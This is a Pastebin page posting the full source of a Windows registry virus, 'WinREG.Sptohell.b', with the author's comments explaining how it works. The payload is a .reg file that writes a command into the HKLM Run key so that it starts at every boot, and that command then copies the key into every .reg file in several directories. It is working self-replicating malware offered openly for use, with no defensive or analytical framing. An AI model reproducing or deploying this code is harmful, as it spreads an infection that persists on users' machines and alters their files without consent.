Advertisement
FlyFar

Virus.WinREG.Sptohell.b - Source Code

Jul 6th, 2023
1,338
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
REG 0.84 KB | Cybersecurity | 0 0
  1. REGEDIT 4
  2.  
  3. ;; ***************  --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <--  ***************
  4. ;;
  5. ;; You may ask: "Why do I write such a nonsense virus?"! +fg+ The reason is, that I have never seen such a virus
  6. ;; in any ezine before. And I think, many ppl don't know, that such viruses exist.
  7. ;;
  8. ;; The virus itself is ******** easy. First, it copies itself to the Registry, so the code will be started by every
  9. ;; start of the computer. The code searches for every *.reg file in 4 directories. If it finds some, it copies
  10. ;; itself (the code in the registry) to these .REG-files.
  11.  
  12.  
  13. [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
  14. @="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement